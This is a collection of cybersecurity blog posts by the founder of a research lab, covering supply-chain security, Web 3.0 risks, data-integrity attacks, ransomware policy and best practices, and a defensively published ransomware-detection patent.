Those who never worked alongside a fraud team might not realize the effect that the words “gift cards” have.  Scammers often ask people to provide gift cards as untraceable payment that can’t be reclaimed.  The suggestion that I purchase and provide gift cards in the name of fraud prevention made me check that my chat session hadn’t been hijacked.  It hadn’t.  Sigh.

So there it is.  In the name of FRAUD prevention, Verizon wanted me to walk into a store once a month forever and hand them a bag of bills with a dollar sign on it, or buy untraceable gift cards.  Somehow that prevents FRAUD more than my just giving them a year’s worth of money in advance.  All because we had a set of charges that were long since paid and nobody was contesting.

There was another solution, of course, involving a store visit.  This only took a single trip.  That store had a sign which read Tmobile.  They happily ported the phone number over, gave my mom a discount, and took a credit card.  Apparently, over 35000 other Verizon wireless customers also “voted with their feet” to leave last quarter.  Tmobile is expected to report a gain in subscribers.

I’m all for protecting accounts, but when arbitrary rules declare FRAUD on charges that are fully prepaid and uncontested, that’s a mistake.  The mistake is compounded when there aren’t adults who can intervene in clearly erroneous decisions.  It’s compounded further when the solution to their error is to inconvenience their customer by demanding a monthly cash payment in person.  It becomes patently absurd to say that gift cards are a solution to prevent fraud.  I don’t know any fraud professional who has ever recommended gift cards as a solution to any problem.  This was a bad business decision, blamed on fraud rules.

Poorly designed rules increase friction to the point that long-time customers become your competitor’s loyal customer.  Blaming poor processes on fraud policies is also why security teams get a bad rap. All in the name of preventing a FRAUD risk that doesn’t exist.

How to make software supply chains resilient to cyber attacks

This article first appeared in VentureBeat

Imagine if someone asked you to drink a glass of liquid without telling you what was inside or what the ingredients might do. Would you drink it? Maybe, if it was given to you by someone you trusted, but what if that person said they couldn’t be sure what was inside? You probably wouldn’t partake.

Consuming the unknown is exactly what IT departments do every day. They install software and updates on critical systems without knowing what’s inside or what it does. They trust their suppliers, but the thing that software suppliers don’t tell IT departments is they can’t be sure of all their upstream suppliers. Protecting all of the parts of a software supply chain, including those outside of IT’s control, is nearly impossible. Unfortunately, bad actors are taking full advantage of this large “attack surface” and scoring big wins in cyber breaches.

A big problem getting bigger

The most famous example was the hack of Austin, Texas-based business software developer SolarWinds in 2020. Attackers inserted malicious code into software that was widely used by industry and the federal government. IT departments installed an update containing the malware and large volumes of sensitive and classified data were stolen.

Other software supply chain attacks have happened at companies like Kaseya, an IT Management software company where hackers added code to install ransomware, and Codecov, a tool provider whose software was used to steal data. And compromised versions of “coa” and “rc” open-source packages have been used to steal passwords. These names may not be familiar outside of IT, but they have large user bases to exploit. Coa and rc have tens of millions of downloads.

Quite obviously, attackers have figured out it’s far easier to hack software that people willingly install on thousands of systems than to hack each system individually. Software supply chain attacks increased by 300% from 2020 to 2021, according to an Argon Security report. This problem isn’t going away.

How could this happen?

There are two ways hackers attack software supply chains: They compromise software build tools or they compromise third-party components

A lot of focus has been placed on securing the source code repositories of build tools. Google’s proposed SLSA (Supply Chain Levels for Software Artifacts) framework allows organizations to benchmark how well they have “locked down” these systems. That’s important because there are now hundreds of commonly used build tools — many of which are easily accessible in the cloud. Just this month, open-source plugin Argo CD was found to have a significant vulnerability, allowing access to the secrets that unlock build and release systems. Argo CD is used by thousands of organizations and has been downloaded over a half a million times.

At SolarWinds, attackers were able to access where source code was stored, and they added extra code that was ultimately used to steal data from SolarWinds users. SolarWinds built its software without realizing that malware was being included. This was like giving an untrusted person access to the ingredients in that glass of liquid.

Even if companies control their own build environments, the use of third-party components creates massive blind spots in software. Gone are the days when companies wrote a complete software package from scratch. Modern software is assembled from components built by others. Some of those third parties use components from fourth and fifth parties. All it takes is for one sub-sub-subcomponent to include malware and the final package now includes that malware. 

Examples of compromised components are staggeringly common, especially in the open-source world. “Namespace confusion attacks” are cases where someone uploads a package and simply claims it to be a newer version of something legitimate. Alternatively, hackers submit malicious code to be added to legitimate packages, since open source allows anyone to contribute updates. When a developer adds a compromised component to their code, they inherit all current and future vulnerabilities.

The solution: A permissions framework

Industry groups and government agencies like the Commerce Department’s National Telecommunications and Information Administration (NTIA) are working on developing a standard and plan to use an executive order to mandate the use of a software bill of materials (SBoM) for government-purchased software. An SBoM is a software ingredients list that helps identify what all of the components are but unfortunately won’t indicate if they were hacked and will misbehave. Hackers won’t list their code in the ingredients.

Developers can improve the security of the build tools they control and list third-party ingredients from their suppliers, but that won’t be enough for them or their users to be sure that none of the ingredients were compromised. IT needs more than an ingredients list. It needs software developers to describe how code and components are expected to behave. IT teams can check those declarations and ensure they are consistent with the software’s purpose. If a program is supposed to be a calculator, for example, it shouldn’t include a behavior that says it will send data to China. Calculators don’t need to do that.

Of course, the compromised calculator might not say that it intends to send data overseas because hackers won’t publicize that software was compromised. A second step is necessary. When the software runs, it should be blocked from doing things it didn’t declare. If the software didn’t say it intended to send data to a foreign country, it wouldn’t be allowed to.

That sounds complicated, but examples already exist with mobile phone apps. When installed, apps ask for permission to access your camera, contacts, or microphone. Any unrequested access is blocked. We need a framework to apply the concept of mobile app-like permissions to data center software. And that’s what companies like mine and many others in our industry are working on. Here are two of the challenges.

One, if a human approves “sending data outside of my company,” do they mean all data? To anywhere? Listing all types of data and all destinations is too much detail to review, so this becomes a linguistic and taxonomy challenge as much as a technical one. How do we describe risky behaviors in a high-level way that makes sense to a human without losing important distinctions or the specific details that a computer needs?

Two, developers won’t use tools that slow them down. That’s a fact. Accordingly, much of the work in declaring how software is expected to behave can — and should — be automated. That means scanning code to discover the behaviors it contains to present findings to developers for review. Then, of course, the next challenge for everyone involved is to determine how accurate that scanning and assessment is.

These challenges are not insurmountable. It’s in everyone’s best interests to develop a permissions framework for data center software. Only then will we know it’s safe to take that drink.

Cybersecurity Risks of Web 3.0

(an edited version of this post first appeared in Security Magazine)

A new web for the Internet brings great promise and great risks, but we can't manage those risks until we define what it is.

What is Web 3.0?

You can't secure something if you can't describe it. The original "web 1.0" was a place to serve static pages built by companies.  Along came forums and social media, and we suddenly had a "web 2.0" in which users created and added content.  Tim Berners-Lee (inventor of web 1.0) coined the term web 3.0 to mean a web based on data that machines could process, not just people. If web 1.0 created an encyclopedia, web 2.0 was Wikipedia, and web 3.0 would make everything on the web into a massive database.

How would it get used?  In a word, AI. 

Why a machine readable web matters

AI eats data, and the promise of web 3.0 was to make all of the web into consumable data. That would provide a massive AI training set, most of which is currently inaccessible "unstructured data". The result could be a step function in AI capability. Imagine a Google, Siri, or Alexa search that was able to use all of it.  Today, if you ask Alexa a question, it might respond with "According to Wikipedia..." and read a web 2.0 article.  In the future, it could understand the meaning of everything online and provide a detailed answer.

Broadening web 3.0

People noticed that the trend was to "decentralize" the web. Web 1.0 served up content controlled by companies, and web 2.0 is platforms controlled by companies hosting user-created content (e.g.Facebook). Why shouldn't web 3.0 provide a new platform for content to be added without a company controlling it? Simultaneously, blockchain emerged as a way in which anyone could post a transaction that would be validated and accepted by the consensus of a community instead of a platform owner. Those uncomfortable with the control of web 2.0 platform owners over content suddenly envisioned user content on distributed and decentralized platforms.

Is that a redefinition of Web 3.0?  Not entirely.  What Tim Berners-Lee described was a web with inherent meaning, which focuses on how data can be consumed. The new definition of a decentralized web focuses on how data gets added. There is no conceptual reason why both can't be right at the same time. I propose that web 3.0 is a platform in which anyone can add content without the control of centralized gatekeepers, AND the content has meaning which can be interpreted by people and machines.

Cyber risks

While the vision sounds amazing, with details to follow, there are concerns. Cyber security practitioners should be nervous about a poorly defined web 3.0 for a number of reasons.

  1. Quality: Web 1.0 relied on the reputation of publishers to be accurate. Web 2.0 lowered data quality, and a lot of online information is just plain wrong (look at all the incorrect posts about Covid or elections). Will the consensus to accept data in web 3.0 include accuracy checks? Who gets to make the decision, what are their qualifications, and what motivates them to be fact-based instead of promoting an agenda?

  2. Manipulation: Intentional manipulation of data that will be used for training AI is a huge concern. People can create bad data to manufacture the results they want, making AI the worlds biggest disinformation system. When Microsoft decided to train their chatbot "Tay" by letting it learn from Twitter, people intentionally sent malicious tweets that trained it to be racist. Imagine what a nation state could do to disrupt things by feeding misinformation data or by changing the meaning of words. How will we find, block, and remove data that is designed to deceive?

  3. Availability: If our systems depend on data, what happens when that data is unavailable? The web today is full of broken links. Machines will either need to make local copies of everything on the Internet or go and fetch stuff on demand (web 2.0 is on demand). This could increase our dependency on the availability of systems we have no control over.

  4. Confidentiality: There is a lot of content online that was accidentally released, often sensitive data stored in publicly accessible folders. In most cases, nobody notices. With machines scanning and including that data in their knowledge base, we suddenly increase the likelihood of private data not just being found, but actually being used. Do we need new ways to prevent accidental release and misuse?


Those are just a few of the issues, more will likely arise as web 3.0 takes shape. Still, it makes sense to consider solutions to privacy and security from the start. 

The future of the web without gatekeepers, holding content meaningful to people and AI, sounds like a dream come true. We need to design in security to keep that dream from becoming a nightmare.

How Hackers will use "Killer Data"

Attacks against data integrity will be the next frontier in cyber warfare, and we need to be ready.

A radiologist “reads” CT scans, looking for signs of cancer. She carefully notes her findings on the unlucky images and is heartened when she writes “Normal” on the rest. The images are clear, and she makes no mistakes. Unfortunately, many her conclusions are wrong because the images have been hacked and changed.

This hypothetical scenario is completely plausible. In 2019, a group of security researchers in Israel proved that they could use artificial intelligence to add or hide cancer in such images, with a greater than 95% success rate in getting radiologists to misdiagnose the disease. They also demonstrated that they could gain access to a hospital’s network and plant a small computer that performed the task. It’s within the reach of hackers to change medical data that make people believe they have a disease they don’t, or make them not get treated for a disease they do have.

Who would do such a thing, and why? To understand, we need to first look at how the motivations of hackers have evolved. Protecting data used to mean preventing unauthorized disclosure, primarily to prevent identity theft. Hackers can file false insurance claims or fake tax refunds if they know enough about you. They can charge items to your credit or debit cards, open new lines of credit in your name, or take over existing bank and other accounts.

A more recent motivation is to extract ransom in exchange for restoring access to information. Ransomware and network denial of service attacks make computers and data inaccessible, followed by demands for payment, and such attacks have skyrocketed in recent years.

That covers attacks against data confidentiality and availability. Why change data? Because we trust it to be accurate, so there’s value in exploiting that trust. Imagine a new form of ransom in which a hacker demands payment to tell a hospital which scans were changed. If the hospital doesn’t pay, patients would be misdiagnosed and mistreated.

In another scenario, imagine that a foreign state wants to influence an election; make a candidate think they have cancer or other disease, and they might drop out, or hide the fact that a leader has an illness, so they don’t seek treatment. Attackers can assassinate someone by creating “killer data” in their medical records. At a large scale, manipulating the results of clinical trials could cause drugs to get released that shouldn’t, or prevent a company from releasing a valuable drug. 

The risks of changed data extend far beyond medicine. When hacktivists compromise web sites, they change the site to add messages that promote their cause. That’s a simple form of changing data. People with agendas post edited images as “fake news” on social media, which can lead to riots. In 2020, someone changed the voter registration information for the governor of Florida, temporarily preventing him from casting his ballot. Fake data can have real consequences.

If the data that are changed represent physical things, the impact can be devastating. Earlier this year, a hacker gained control of a city computer system in Florida and changed values to add toxic levels of chemicals into the water supply. Similar hacks have been made at water treatment plants in places like Israel. Killer data can be a weapon of mass destruction.

Attacks against data integrity will be the next frontier in cyber warfare. Large-scale attacks are coming and we need to be ready.

How do we stop this? Defending against data integrity attacks will require doing things we’ve never had to do before. We can try to prevent attackers from getting in our systems, but we need to add new ways to assess the trustworthiness of the data when they do get in. Attacks against trust can only be stopped by tools that reestablish trust, so that’s where we need to focus. We have some ideas, and need to develop more, before killer data becomes as commonplace as identity theft and ransomware.

Lou Steinberg is founder and managing partner of CTM Insights, a cybersecurity research lab and incubator

This article first appeared in Investment News.

A Better Approach to Securing Software Supply Chains

supplychain.jpg

One fast-growing form of cyber attack is to embed malware into trusted software, allowing it to be installed without the knowledge of a user. This malware can be:

·         introduced directly into the software delivered by a trusted provider,   

·         introduced into third-party provided libraries,

·         embedded in compromised APIs and services,

·         added to open source projects,

·         or injected into source code management tools and repositories, compilers, and packaging system tools. 

The attack surface is massive and dynamic, and in each instance the end result is the same: a software application or update is directly or indirectly changed without the knowledge and consent of the trusted provider or the user.

Your Software Supply Chain isn’t a Chain

Attempts to identify and assess every embedded component in a software package generally fail.  We can periodically survey software providers to see if their policies, procedures and practices meet minimum expectations, but that tells us little about specific software packages and even less about the components they source from others. 

Worse, a package may use multiple third-party components, each of which may have multiple embedded components.  While commonly referred to as a “software supply chain”, it’s more like a pyramid; the deeper you go, the more suppliers there are and the less visibility you have. 

 

supplyPyramid.png

Imagine your software vendor licenses a library from another company, that library makes a service call to a third company, and that service contains open source code.  What visibility would you have into the quality of the open source code?   Would you even know it exists?  Your ability to trust components decreases exponentially with distance (supplier layers).

No Good Baseline

It’s clear that we can’t evaluate the security of each component, especially when we don’t even know what all of the components are.  We can assess the finished software package, which is a smaller surface area that doesn’t require being able to pre-identify every part.  However, that assessment presumes we know what to look for. 

Static scans rely on things such as signatures, so new or custom malware could easily be missed.  We can do behavioral “dynamic analysis,” but the behavior baselines are generally built from past behaviors.  New software doesn’t have a past history, and updates are generally expected to have new features (meaning new behaviors).  In short, we don’t have a good baseline to compare against.

A new approach is clearly needed.

Declared Intent

That new approach is “Declared Intent.”  The premise is to evolve and apply the whitelist permission concept used by mobile apps.  When you install a mobile app, it asks for permission to access resources such as your camera, microphone, files, or network.  You can review the resources and decide if they make sense for the app you are installing.  You can also deny access.  

We need something like that in data center (and desktop) apps, only better.  We need to whitelist more than resources; we need to whitelist risky behaviors with resources.

Imagine if every provider of software components included a file that declared the intended behavior of their code.  Want to send data to a server in a foreign country?  Declare it.  Want to kill running processes that your software didn’t create?  Declare it.  Want to read files owned by another user?  Declare it. 

The declarations from each component could be combined and added to the declarations from the developer who created the finished package.  Unlike mobile apps, we wouldn’t just declare access to resources, we would declare actions.  With resources such as files, the risky behavior might be reading or writing files not owned by this userid and not in a publicly accessible directory (in Linux systems, this could include breaking out of a namespace).  A security team could review all declarations and decide if the behaviors are warranted before installing the software or update. 

We need to start by defining a behavioral framework and classification system for declarations.  One good approach is to inspect “system calls,” since most risky behaviors require acting through the operating system.  Of the roughly 400 Linux system calls, there are about 20 actions that are likely to be of interest to a security team.  We can layer on “variables” that further describe the specific resource. If a risky behavior is reading a file not owned by this program’s userid, the “variable” might be the filename or path of the file being read.

·         Step 1: Static Analysis.  Most software providers would bristle at the notion of having to manually classify the behaviors of their code; it runs counter to investments in developer productivity.  Automation through static analysis can help.  If we know what behaviors to look for, we can scan source code at check-in or build to automatically produce declarations.  Ideally, these declarations would be reviewed and tweaked by a developer who has a deep understanding of his/her intent and the “variables” described above.

When presented with a compiled binary component that lacks behavior declarations, we can scan the binary and detect system calls in assembly language.  This method is guaranteed to catch every system call, but is less perfect at capturing intent.

For “variables” that aren’t defined in the software, such as those in user-created config files, we can supplement the declarations by asking the user to whitelist certain addresses and file paths.

·         Step 2: From SBoM to SBoA.  Once behaviors are defined, they need to be stored and shared in a well understood format.  Fortunately, people have already been thinking about ways to describe applications and their components through a Software Bill of Materials (SBoM). 

Most SBoM work has focused on capturing the versions of components for license compliance checks and vulnerability tracking, but why stop there?  We propose extending one or more SBoMs to include the intended behaviors of each component in the package, in effect creating a Software Bill of Activities (SBoA). Leveraging and extending a standard SBoM schema makes the behavior declarations easier to consume and understand by both humans and tools.  It also increases the value of an SBoM by adding new use cases.

Leveraging an SBoM means we get the benefit of all of the work that’s gone into deciding how SBoMs should be stored, published, secured, and maintained.  SBoAs have these same needs.

·         Step 3: Catching Gaps.  In an ideal world, every risky behavior in every software package would be pre-declared, stored in an SBoA, and risk-assessed by users.  Security professionals don’t believe in ideal worlds.  Motivated attackers will seek to obfuscate injected code, add code after the declarations are captured, or manipulate the SBoA.  Not all software suppliers will include an SBoA, and some may include versions that are out of date.  As a result, we will be left with gaps in declarations.

Systems designers would describe those gaps as the result of having an “open loop system,” relying on the SBoA to be accurate as it gets created and updated.  A “closed loop system” would ensure that the final SBoA is correct through a feedback loop. 

How?  By using the SBoA, which describes intended software behavior, to detect undeclared behaviors.  SBoAs are deterministic representations of intent, not best guesses based on previously observed behavior, making them the perfect baseline for runtime, dynamic analysis.

An SBoA could be ingested by a container or VM, loaded by an application firewall, or even translated into operating system “system call filters.”  As an application runs, violations could be blocked or generate alerts.  If a risky behavior isn’t declared, through simple omission or because of a malicious hack, it will be detected.

This three-step process of capturing intended behaviors, publishing them in a standard format for review, and runtime assessing for undeclared behaviors creates a trustworthy system.

supplychainsteps.png

More than the Sum of the Parts

The real value of this approach in securing software supply pyramids is more than the sum of the parts.  Static scans to declare behaviors, reviews of expected behaviors in an SBoA, and runtime enforcement of behaviors each have stand-alone merit. 

Value in the intersection

Value in the intersection

The intersection of all three creates a much more secure application.  Risky behaviors are declared, reviewed, and enforced without obvious opportunities for attackers to circumvent the system. 

 

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator.  CTM is researching the best ways to implement behavior whitelisting using Declared Intent.  We invite those interested to join us.

 

Making ransomware payments illegal

Last week, the US Department of Homeland Security announced a new public-private partnership called the Joint Cyber Defense Collaborative (JCDC).  The JCDC will align government with (mostly tech) company efforts to address key cybersecurity issues, the first of which is ransomware.  

While the JCDC sounds like a great idea, it isn’t needed in this case.  The government could easily stop most ransomware.

This administration gets high marks for recruiting talented cybersecurity leaders.  Chris Inglis is the White House’s National Cyber Director and Jen Easterly is the Director of the Cybersecurity and Infrastructure Security Agency (CISA).  Both are highly capable, but their talents are better focused elsewhere.

Ransomware is an economic attack that uses technical means.  Treating it as a technical problem misses the point.  There are technical controls that can help, of course, such as timely patching and frequent backups.  Technical controls are just point-in-time solutions; as better defenses are deployed, attackers evolve.  For example, when defenders Improved backups attackers evolved their methods by threatening to leak their victim’s sensitive data.  This is called “co-evolution”; both attackers and defenders ratchet up their capabilities over time.

While attacker’s methods may evolve, their motives remain unchanged.  In the case of ransomware, we are almost always talking about financial extortion.  Anonymous payments via cryptocurrencies, such as Bitcoin, have emboldened attackers by making it harder to follow the money. But neither the absence of controls nor the payment schemes are the best place to fundamentally disrupt this system. 

To really impact ransomware, we need to address the motivation behind it.  If the government made it illegal to pay ransom with impactful penalties (e.g. making corporate officers personally liable), the attackers would have little interest in continuing.  No public company with audited books would pay.  No municipality, public hospital, public school, or nonprofit would pay.  Nobody with audited financials would pay and risk going to jail.  At that point, there would be no reason for attackers to do the work and demand payment—they can’t get paid.

There might be some individuals and small private companies who pay and assume they won’t be caught.  Still, by making payments illegal we force the attackers to scale down to a less profitable segment of people without scrutinized books.  We shrink the value of attacking.

A version of this law already exists.  It’s illegal today to make a ransomware payment to an individual or country subject to (OFAC) sanctions.  Practically speaking, this is hard to enforce because the anonymity of cryptocurrency payments hides their destination.   We could either expand the regulation by saying that payers of ransomware have to explicitly know to that they aren’t violating sanctions, or simply outlaw all ransomware payments.

Some may argue that this is penalizing victims.  I disagree.  Until such a law takes effect, the victims are allowed to pay increasingly large ransoms.  Once the law takes effect, payments would stop.

Most laws exist to protect society from potentially harmful action of others.  Those who pay ransom today encourage attackers to continue attacking others.  Incenting someone to attack more victims creates harm to others.  We’ve seen this play out as both the frequency of attacks and the size of payments demanded have grown exponentially.

There is absolutely a role for government to play in stopping ransomware, and it’s simple.  Legislate.  Outlawing ransomware payments would remove the incentive to attack.  

 

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator

What you can do about ransomware

When non-technical people ask what I do, I usually say “I run a cybersecurity research lab and incubator.  Over the last 4 years we’ve solved hard problems like adding trust to the Internet, giving consumers control over what happens with their data and accounts, making cloud data worthless if stolen, stopping ransomware in its tracks, and detecting fake pictures online.  Now we’re working on things like protecting databases from being changed and protecting software from embedded malware”.

Not a week goes by without someone responding “Ransomware?  What should I do about Ransomware?”  For those lucky enough to have avoided this worry, ransomware is a type of computer attack in which extortionists encrypt the data on your computer, demanding payment to return access to your own files.  Many attacks are combined with a threat to make sensitive data public if payment isn’t received.

My stock answer is a list of controls, starting with “make frequent backups and test them”.  For those who want to do more, I rattle off a list based on their company’s technology maturity.

Having done this frequently, I thought it time to capture my “best practices for preventing ransomware” list.  These are a list of good, better, and best cumulative controls that companies can check themselves against…all of which have a role to play in preventing an initial attack, minimizing impact, and recovering from damage done.  Many help with other types of cyber attacks, even though the focus here is ransomware.    I know that others will have tools and techniques they favor or may prioritize things differently; this list is my opinion of how I view the controls landscape at this moment in time.  I’m publishing it to offer one person’s plain English guidance to those worried that they might not be doing enough (with tech details and keywords in parenthesis in case you want to learn more).  Finally, I will caution that just because a tool is implemented doesn’t mean it’s working well, and that no system will stop all threats. 

I hope this gives comfort to those who have a solid set of defenses and ideas to everyone else. 

 

Best practices for preventing and mitigating ransomware attacks

 

Identify

Good

  • Create and update an inventory of critical systems and services to monitor

Better

  • Discover newly added internal systems and services, alert if unexpected

  • Discover newly added cloud systems and services, alert if unexpected

Best

  • Discover sensitive data both internally (servers, desktop files, etc) and in cloud storage, alert if unexpected

 

Prevent

Good

  • Tools and services that block malicious links in emails (web proxies, URL link protection)

  • Significant patches applied in a timely manner based on system criticality and connectivity to other systems (“criticality” is defined as providing critical functions or holding sensitive or important data)

  • Checking and enforcing passwords for minimum complexity

  • Two Factor Authentication (2FA or MFA) when logging into high-risk or Internet facing systems and applications, including those hosted in the cloud.

  • Vulnerability management- monthly scans to discover and remediate material vulnerabilities on both internal and external facing systems (prioritized by vulnerability “CVSS” score and system criticality)

Better

  • Regular (e.g. annual) training of users on best-practice security behaviors

  • Internal firewalls to limit connectivity between systems with similar functions like desktops (east-west firewalls) and systems with different functions (north-south firewalls)

  • Only granting users and software the minimum permissions necessary to operate (least privileged policy)

  • 3rd party penetration tests and internal “red team” attempts to exploit vulnerabilities

Best

  • Threat actor capability modeling (e.g. ATT&CK framework), mapped against defenses

  • User awareness testing (e.g. internal phishing campaigns, USB drop tests)

Detect

Good

  • Logging and logfile monitoring and alerting for unexpected behavior

  • Monitoring and replacing end of life hardware and software (inventory lifecycle management)

  • Signature based antivirus/malware scans of servers, desktops, and mobile

Better

  • Behavior monitoring and analytics of both users and software/services, with alerting

Best

  • Security Operations Center (SOC), monitoring for incidents

 

Respond

Good

  • Alerting and blocking data movement (exfiltration) based on volume and destination (Data Loss Prevention)

Better

  • Predefined policies and run books, describing actions for different types of incidents. These must be printed or on a system not connected to your network so they can be accessed when systems are compromised

Best

  • Data classification, with alerting and blocking unauthorized movement of sensitive data across internal and external boundaries (Data Loss Prevention)

  • Automated scripts that implement predefined runbooks in response to incidents

  • Tools to rapidly isolate or quarantine suspect systems

  • Tools to throttle CPU, network, and storage bandwidth on suspect systems

  • Pre-built tools to partition networks, limiting the spread of potential infections (submarine doors)

Recover

Good

  • Daily or continuous backups of all critical systems, regularly tested

  • Pre-defined breach notification plan

  • Pre-identified forensic capabilities, using internal resources or external vendors

Better

  • Cyber insurance

Best

  • Regular scans of the “dark net” looking for stolen data

 

What if you’ve become a victim already?

Maybe you implemented controls, maybe some were lacking.  Once you are a victim, here’s what I’d recommend

Do

  • Immediately remove suspect systems from your network so the infection can’t spread

  • If you see lots of disk drive activity, or believe that files are still being encrypted, power the system off as quickly as possible.

  • Test your backups, if you have them.  This will let you know if you have the ability to recover.

  • Engage a cybersecurity forensics team (if you have cyber or business interruption insurance and don’t have the skill in-house, your insurance company may have recommendations).

  • Check legitimate ransomware decryption sites (e.g. https://nomoreransom.org ) to see if your files can be recovered.  Your antivirus vendor may be able to help as well.

  • Have the forensics team determine how they got in and remediate vulnerabilities.  Also have them scan for other infected systems.  A best practice is to wipe or replace as much of your compromised network gear and systems as possible.

Don’t

  • Assume the bad actors only compromised the systems you know they were on.  Unless you are certain a system wasn’t compromised, assume it was.

  • Assume that if you pay a ransom you will get your files back.  You might, but you are trusting people who just held you hostage.  You might also encourage future extortion if you pay.

  • Download ransomware removal or decryption tools from untrusted sources.  You don’t want to make things worse.

  • Hire a company that claims they will crack the encryption unless you know they are legitimate.  Some companies that charge to do this actually pay the ransom and pocket the difference.

Giving away Ransomware IP

I will be the first to say that what follows is an unusual blog. A year ago, CTM filed a provisional patent on a new way to detect and mitigate ransomware. Today, I am not only letting the application expire, I’m publishing the provisional document so that neither I nor anyone else can patent the concepts.

Why? Because this needs to exist, and the best way to enable that is to make the idea freely available. To anyone. It’s called a defensive publication; by placing the idea in the public domain, nobody can claim it. Including me.

A provisional patent simply stakes a claim at a point in time. It doesn’t necessarily fully flesh out the concept. It doesn’t get reviewed. It’s a way to say that you are claiming an idea, and gives the author a year to work out details and apply for a full patent. Today is 1 year.

The problem I noticed with ransomware was that most people focus on preventative controls like patching and firewalls to stop lateral movement before an attacker got a foothold. They also (correctly) focus on controls like backups to help recover after an incident. What was missing was a way to limit the damage during an active attack. Kind of a preventative control in the moment.

Ransomware often goes through 3 distinct phases. In phase 1, an initial system is compromised— often because a user clicked on a malicious link or file, or because of an unpatched vulnerability in an internet facing system. In phase 2, the ransomware attempts to quietly spread to as many other machines as possible. It moves stealthily so as to preposition itself on as many systems as possible before it activates. In this phase, it may exploit very different vulnerabilities than the one it used in phase 1. In phase 3, all deployed instances of ransomware activate simultaneously. At that point, it’s often too late to contain (assuming it spread in phase 2) and it’s now a race to shut off infected systems while they are busy being encrypted.

Phase 3 is generally “noisy”, with the malware trying to encrypt as many files as possible before being stopped. Modern ransomware prioritizes the files most likely to be valuable, so even if interrupted it’s likely too late. The number of systems plus the sheer speed of data loss overwhelms the ability to stop it. Networks are unplugged to limit any further phase 2 spread, and infected machines shut down, but generally too late.

In its need to go quickly lies an opportunity. Ransomware should be detectable by it’s noisy behavior. We can certainly monitor for large amounts of files being open, encrypted, and written back to the disk. We can look for changes in entropy as well. Why not use that as a trigger to limit the damage? Most people say the issue is false alarms; automatically shutting the machine down just because it’s behaving unusually risks real damage if we guess wrong. Not worth the risk of stopping something like a server that isn’t infected.

What if we don’t stop it? Our first big idea was to slow writes to the disk when we think ransomware might be active in stage 3. We can implement a delay in the storage device driver. We never stop the system, and reads are unaffected, but incrementally slowing writes while notifying an administrator limits the damage and gives an administrator time to check things out. If we trigger in error, the machine runs slowly for a little bit, but it keeps running.

Implementing this in the storage device driver has several other benefits. It’s a natural place to watch for read and write behavior system-wide, so it doesnt’t rely on individual process monitoring (which is easily defeated by running a larger number of malware processes, none of which individually trip a threshold). It’s also hard for malware to disable the storage driver without rebooting the machine, which we would notice.

The second big idea was to use the order of operations to help fine tune ransomware detection. At the file level, the behavior is deterministic in that an encrypted file can’t be written or deleted before an unencrypted version is read. Leveraging this understanding further reduces the probability of a false trigger.

So that’s it. What follows is the original provisional that was filed. The form may be something only a patent examiner would love, but I’m replicating it here without change to ensure zero ambiguity..

Anyone who wants to implement these ideas can do so knowing that I have explicitly relinquished any claims to them. Improving our ability to stop ransomware is far more important than my having another patent in my portfolio. If you are a developer, feel free to take it from here.

/lou

System and Methods for Establishing a Sequence-Based Approach to Ransomware Detection

Background

As noted in US Patent Application Number 20190228153 by Scaife, et. al. (Scaife), it is desirable to detect ransomware by monitoring its behavior. All ransomware must by its nature to read files, process them through means like encryption, and write the results. The results must either overwrite the original file or delete it to deny the legitimate owner access to unencrypted data. This fundamental behavior of ransomware, necessary to achieve its objectives of denying legitimate access to files, can be adjusted but not materially changed which creates an opportunity for real time detection and blocking before substantial damage is done.

As the use of ransomware has increased in popularity by bad actors, the need for such defenses is apparent.

The approach referenced in the Scaife Application has several shortcomings, which permit ransomware opportunities to avoid detection. The existing approach taught and disclosed focuses on the behavior of each process running on a computer.  Scaife defines a process as an instance of computer code. Those creating ransomware software can seek to avoid detection by simply creating many small processes, none of which behave in a manner to sufficiently trigger detection by exceeding a preset threshold or malware score. In the aggregate, however, they collectively achieve their purpose.

Additionally, the existing approach scores activity attributes (such as reading files, increasing system entropy, and writing files) without regard to their sequence. As a ransomware file cannot be written before it is modified (through encryption or other means), and cannot be encrypted before it is read, a better method of detection with reduced false alarms would be to score the sequence of events instead of or addition to their discreet activities.

Malware creators, including those creating ransomware, have demonstrated that they will evolve their software to evade detection. It is therefore reasonable to assume that process-based attribute scoring will be rendered less effective by simple changes to ransomware. This creates a need for an improved solution.

Further, US Patent application 20180157834 of Continella et al (Continella)combines detection with transparent file recovery by replacing potentially compromised files.  Unfortunately, this may result in additional storage requirements for "shadow copies" and/or legitimate changes being replaced and lost.  In doing so, Continella may increase costs and/or harm the correct operation of the system.  A method which reduces potential harm but does not create new issues or increasing storage costs by copying and/or replacing legitimately modified files is therefore needed.

Finally, it is always desirable to reduce "false alarms" in any detection system.  False alarms distract users from other activities and can, when followed by an action to remediate, create new issues.  Therefore, methods to better score and detect legitimate issues while reducing false alarms are needed.


Detailed Description

As noted above, the Scaife approach includes for detecting an instance of a malware process by scoring the behavior of said process using a combination of attributes.  An easy way to avoid detection would be to create many small processes that each, individually, limit their activity to a level that does not meet the threshold of a test.  The present disclosure proposes a method of looking at the combined behavior of all processes simultaneously.  Using this method, an infected system will still be detected even when many small malware processes are run.  This might, for example, be done by inserting software at the storage "device driver" layer that observes all read and write activity regardless of process.

It is also important to note that reacting to a detected event is critical to minimize harm.  The Scaife approach envisions simply stopping ("dropping") a suspect process.  Such an action can cause issues with legitimate processes which are not permitted to run and can be even more harmful if full system activity is being stopped; many operating systems will fail if they are suddenly stopped from accessing storage.  Instead, the present disclosure implements a system that slows all system access to its storage, whether directly attached or via a network.  Slowing access, particularly write access, allows the system to continue to operate (at an intentionally degraded level).  This minimizes the rate of damage and allows a legitimate administrator time to be notified of the detected issue and to intervene if necessary.  In one embodiment, the added performance delays may be increased if no action is taken to affirm that the system is running as expected or if additional and repeated behavior is observed.  This effectively slows the performance more, in preferred embodiments when writing, should an administrator not intervene.   

